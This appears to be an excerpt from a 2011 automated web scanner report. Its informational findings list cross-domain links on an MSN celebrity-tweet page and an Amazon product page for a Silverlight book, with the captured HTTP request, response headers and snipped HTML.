<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a> Egyptian activists are cobbling together their own internet: <a href="http://bit.ly/e3toNb">http://bit.ly/e3toNb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473844573179904">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/mccordalex">mccordalex</a>: <a href="http://twitter.com/Punch800">@Punch800</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/mccordalex/statuses/31471195719208960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/iamdiddy">iamdiddy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/31469852891807744">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/SarahKSilverman">SarahKSilverman</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/SarahKSilverman/statuses/31469730384580608">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/MirandaBuzz">MirandaBuzz</a>: A picture of towel art in the hotel. The elephant in the room. ;) <a href="http://yfrog.com/hsi3mlfj">http://yfrog.com/hsi3mlfj</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/MirandaBuzz/statuses/31469606199623680">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468574493114368">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>: Hate when that happens! Lol RT <a href="http://twitter.com/CarlaDiBello">@CarlaDiBello</a> RT <a href="http://twitter.com/PeterGriffinn">@PeterGriffinn</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468288559030272">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.370. http://www.amazon.com/gp/product/0470650923

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/product/0470650923

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /gp/product/0470650923?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0470650923 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:52 GMT
Server: Server
x-amz-id-1: 10BYGVG84SJDT6NK5QPW
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Q88q6IxskVrNIWayV7qw53kBxjzbTCVGq9rikqIi4h0WIkQdBAnBtxKB8IUJkYyC
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-2919974-2112928; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=yQ9pIXqVNQ+kictSRtVelTJ1cwo6IQrEPJd+SWonrlO++kyS3eLyIk/nXbtbxx8D0mbpsSGjtlUuYe0vRowEBFX4sJLod/zu37k/IErBpleFnaz490Xa9SJrjYxKo9y6hu8Qw1NAIvP4UUaxU2L8jbY4r+JHs4ZKm4hST9QEmWm4QdymYv1J0wtClao472qWA+wllUTs9XnshUSKK5Zm7V07ZqJFh4wIijJE8gGWy6ub2Eb0pbSAyRM/8LmJTh6hNxn3d/uTTI7mbtQzIJuC04Uu58ASnyvxk5fZ6wzy7FLYCySmGxvLO1zbG7cicDX3t7BaUJKRVQDLOs9+B6raaQASSQzPOHnazizlJ7UsFvCoBiazT7uOFWxYUsf/18czWXcuM7antU7XxMLLqoSkfFWlqwjyu3ae8xXJ53xwMF3gWWGRilFqmd2KJU/GPs60FA1sCx6Rd0c=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:52 2011 GMT
Content-Length: 413393


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0470650923"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0470650923/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" onmouseover="" /></a>
...[SNIP]...
on.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=10BYGVG84SJDT6NK5QPW&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=0470650923"><img src="http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif" width="50" align="left" alt="Textbook Student" height="37" border="0" /></a>
...[SNIP]...
<div style="float: left; width: 75px; padding-right: 8px;"><img src="http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif" width="75" height="75" border="0" /></div>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALZW6GY2r9vEb4CTvHw0RRGuDlaxa2nayoeavpXZujfJYaGkH19.QyQYSTKJIpPIuSLDdbVQwariibRKDEEBidwMMIvS7NV23vnW88w.q8dZA9ozyi0xOcaCV2rA6PqlCxdFs7RXXaVO1W7v4WzVNT8fBLUIyfLFyRwra7ZeOUUfaVGjZB2pLK89LytjDdnO-TS7jD-MNNWfrXp.4m7QWmACRFir-G4um3Eo-sGcWRFyQi-Qymdlr7vUyOaBt6J8bPvnhkdtkWSyN8TgeEpEp4X9f-VmnDJ3CIRl1rCRIAQHdhGkBfgv73UNyLnTnS0RxwlK2HysI-Fn3Hlg9th7KewdXWWuuWllCzrPorIfyAVV72pGJGL5st66H0q.5r3fEQV3JwNOC.quDvOb3JkWH-vuG1IbHw6fXU6izjyP8Bm1haiuW7pHhVwq3ZHSsoC70GW98jb3kJ7n29aK.bi42NCadLs02otET3UkhHbYlk2s&awt=1&s=" rel="nofollow"><b>Silverlight</b></a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALZW6GY2r9vEb4CTvHw0RRGuDlaxa2nayoeavpXZujfJYaGkH19.QyQYSTKJIpPIuSLDdbVQwariibRKDEEBidwMMIvS7NV23vnW88w.q8dZA9ozyi0xOcaCV2rA6PqlCxdFs7RXXaVO1W7v4WzVNT8fBLUIyfLFyRwra7ZeOUUfaVGjZB2pLK89LytjDdnO-TS7jD-MNNWfrXp.4m7QWmACRFir-G4um3Eo-sGcWRFyQi-Qymdlr7vUyOaBt6J8bPvnhkdtkWSyN8TgeEpEp4X9f-VmnDJ3CIRl1rCRIAQHdhGkBfgv73UNyLnTnS0RxwlK2HysI-Fn3Hlg9th7KewdXWWuuWllCzrPorIfyAVV72pGJGL5st66H0q.5r3fEQV3JwNOC.quDvOb3JkWH-vuG1IbHw6fXU6izjyP8Bm1haiuW7pHhVwq3ZHSsoC70GW98jb3kJ7n29aK.bi42NCadLs02otET3UkhHbYlk2s&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALZW6GY2r9vEb4CTvHw0RRGuDlaxa2nayoeavpXZujfJYaGkH19.QyQYSTKJIpPIuSLDdbVQwariibRKDEEBidwMMIvS7NV23vnW88w.q8dZA9ozyi0xOcaCV2rA6PqlCxdFs7RXXaVO1W7v4WzVNT8fBLUIyfLFyRwra7ZeOUUfaVGjZB2pLK89LytjDdnO-TS7jD-MNNWfrXp.4m7QWmACRFir-G4um3Eo-sGcWRFyQi-Qymdlr7vUyOaBt6J8bPvnhkdtkWSyN8TgeEpEp4X9f-VmnDJ3CIRl1rCRIAQHdhGkBfgv73UNyLnTnS0RxwlK2HysI-Fn3Hlg9th7KewdXWWuuWllCzrPorIfyAVV72pGJGL5st66H0q.5r3fEQV3JwNOC.quDvOb3JkWH-vuG1IbHw6fXU6izjyP8Bm1haiuW7pHhVwq3ZHSsoC70GW98jb3kJ7n29aK.bi42NCadLs02otET3UkhHbYlk2s&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">intersystems.com/Cache</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJWKvKolhHM3CGJ903ZU7uhtabj-7WLC3n1Ns4Y0ZDCtzSIZQb292ueOKuraopIfWP0EjFCL44Wdj5fjl4aVjheGVhPyNSeM1qdwdoC-lzUlglSR1gVNp5NYqsE2PPvMqEkxs9PgjEyGQPI0bYMgRfnwPA0z7xvP.tpwHJi0nt7mzvy1zPCHs5Ixn6W36U9bX5wCEVmDb5apgbJTYgqHsUo6RM5E8z2CqkAZgOh0Q32jGlyaLGUTUANRs9S.bz.zyXHOAAps.DxTH7pYc.V32y7IM--9CsWVvJVY9tL2c.3a7OMdjw2UAnTzur9kTxhypNDooKW-4IgTWEPK2Q0To3AR2xyojgrD9oxRL-N.5HxcduaiQOu8K2rUAaVk.TkYbQV96HC4Xq3UZ8xyKBqLphfQ-ZuWwb9-KiU16dYPHf.wiIaZ7am9WvBemjX-ER.J5L0nCjVL0qhSRuaIrauas2ryAFCcPSssfQ__&awt=1&s=" rel="nofollow">Web Development Careers</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJWKvKolhHM3CGJ903ZU7uhtabj-7WLC3n1Ns4Y0ZDCtzSIZQb292ueOKuraopIfWP0EjFCL44Wdj5fjl4aVjheGVhPyNSeM1qdwdoC-lzUlglSR1gVNp5NYqsE2PPvMqEkxs9PgjEyGQPI0bYMgRfnwPA0z7xvP.tpwHJi0nt7mzvy1zPCHs5Ixn6W36U9bX5wCEVmDb5apgbJTYgqHsUo6RM5E8z2CqkAZgOh0Q32jGlyaLGUTUANRs9S.bz.zyXHOAAps.DxTH7pYc.V32y7IM--9CsWVvJVY9tL2c.3a7OMdjw2UAnTzur9kTxhypNDooKW-4IgTWEPK2Q0To3AR2xyojgrD9oxRL-N.5HxcduaiQOu8K2rUAaVk.TkYbQV96HC4Xq3UZ8xyKBqLphfQ-ZuWwb9-KiU16dYPHf.wiIaZ7am9WvBemjX-ER.J5L0nCjVL0qhSRuaIrauas2ryAFCcPSssfQ__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJWKvKolhHM3CGJ903ZU7uhtabj-7WLC3n1Ns4Y0ZDCtzSIZQb292ueOKuraopIfWP0EjFCL44Wdj5fjl4aVjheGVhPyNSeM1qdwdoC-lzUlglSR1gVNp5NYqsE2PPvMqEkxs9PgjEyGQPI0bYMgRfnwPA0z7xvP.tpwHJi0nt7mzvy1zPCHs5Ixn6W36U9bX5wCEVmDb5apgbJTYgqHsUo6RM5E8z2CqkAZgOh0Q32jGlyaLGUTUANRs9S.bz.zyXHOAAps.DxTH7pYc.V32y7IM--9CsWVvJVY9tL2c.3a7OMdjw2UAnTzur9kTxhypNDooKW-4IgTWEPK2Q0To3AR2xyojgrD9oxRL-N.5HxcduaiQOu8K2rUAaVk.TkYbQV96HC4Xq3UZ8xyKBqLphfQ-ZuWwb9-KiU16dYPHf.wiIaZ7am9WvBemjX-ER.J5L0nCjVL0qhSRuaIrauas2ryAFCcPSssfQ__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.bericotechnologies.com/careers</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AN4jYU4ypQbCyXqsUe-vOVtPwRfL1vTeNjpF8wF5clB3lveVwVclTIiZEXQuj8BZtv9w7TxL9CpyREoJ9QF7iaAVV8tQKyE4EKrS.wvWRiwr9TcR.qsg2p5lpi2mAGsSHtzXs3L124Wnr-pvOEyuCBv72xdJ-YoRWowVbRPcOIAQHDpvA.9H5w1dJO8FW2G8RhQp2dcvAyyyi6l2kFkqWapoBvSI0qHB6DDihxZX0Tn.t.GyNiB6Ion97oh1tl.34cDYn54bXxipUPSVoLCTUgLUmzZLHBK163CToTzIRCMLC.nGnYCG6vqnofhm15Ch2qpTeP9SNG5reRSNHFgeu9IhSM-x3Kep5wp7XO6wgzjwtlTV4g4jWOqN31sSAR-AqvYKMLqP0kaTWJ4vkTQdOLeevyWnegqnor1p6FsRiz0N469L89YmHU646oM1i1GW3tRCYaS0B20SqU72T-z4USTTZM8QE2rmMMZn-QMWJtwS&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AN4jYU4ypQbCyXqsUe-vOVtPwRfL1vTeNjpF8wF5clB3lveVwVclTIiZEXQuj8BZtv9w7TxL9CpyREoJ9QF7iaAVV8tQKyE4EKrS.wvWRiwr9TcR.qsg2p5lpi2mAGsSHtzXs3L124Wnr-pvOEyuCBv72xdJ-YoRWowVbRPcOIAQHDpvA.9H5w1dJO8FW2G8RhQp2dcvAyyyi6l2kFkqWapoBvSI0qHB6DDihxZX0Tn.t.GyNiB6Ion97oh1tl.34cDYn54bXxipUPSVoLCTUgLUmzZLHBK163CToTzIRCMLC.nGnYCG6vqnofhm15Ch2qpTeP9SNG5reRSNHFgeu9IhSM-x3Kep5wp7XO6wgzjwtlTV4g4jWOqN31sSAR-AqvYKMLqP0kaTWJ4vkTQdOLeevyWnegqnor1p6FsRiz0N469L89YmHU646oM1i1GW3tRCYaS0B20SqU72T-z4USTTZM8QE2rmMMZn-QMWJtwS&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AN4jYU4ypQbCyXqsUe-vOVtPwRfL1vTeNjpF8wF5clB3lveVwVclTIiZEXQuj8BZtv9w7TxL9CpyREoJ9QF7iaAVV8tQKyE4EKrS.wvWRiwr9TcR.qsg2p5lpi2mAGsSHtzXs3L124Wnr-pvOEyuCBv72xdJ-YoRWowVbRPcOIAQHDpvA.9H5w1dJO8FW2G8RhQp2dcvAyyyi6l2kFkqWapoBvSI0qHB6DDihxZX0Tn.t.GyNiB6Ion97oh1tl.34cDYn54bXxipUPSVoLCTUgLUmzZLHBK163CToTzIRCMLC.nGnYCG6vqnofhm15Ch2qpTeP9SNG5reRSNHFgeu9IhSM-x3Kep5wp7XO6wgzjwtlTV4g4jWOqN31sSAR-AqvYKMLqP0kaTWJ4vkTQdOLeevyWnegqnor1p6FsRiz0N469L89YmHU646oM1i1GW3tRCYaS0B20SqU72T-z4USTTZM8QE2rmMMZn-QMWJtwS&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">ria.softwebsolutions.com</a>
...[SNIP]...
<a href="http://www.amazon.com/Professional-Silverlight-Wrox-Programmer/dp/0470650923/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Data-Services-Cookbook/dp/1847199844/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft Silverlight 4 Data and Services Cookbook" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Step/dp/073563887X/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft Silverlight 4 Step by Step (Step By Step (Microsoft))" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Data-Services-Cookbook/dp/1847199844/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_1847199844" ><img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Microsoft Silverlight 4 Data and Services Cookbook" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
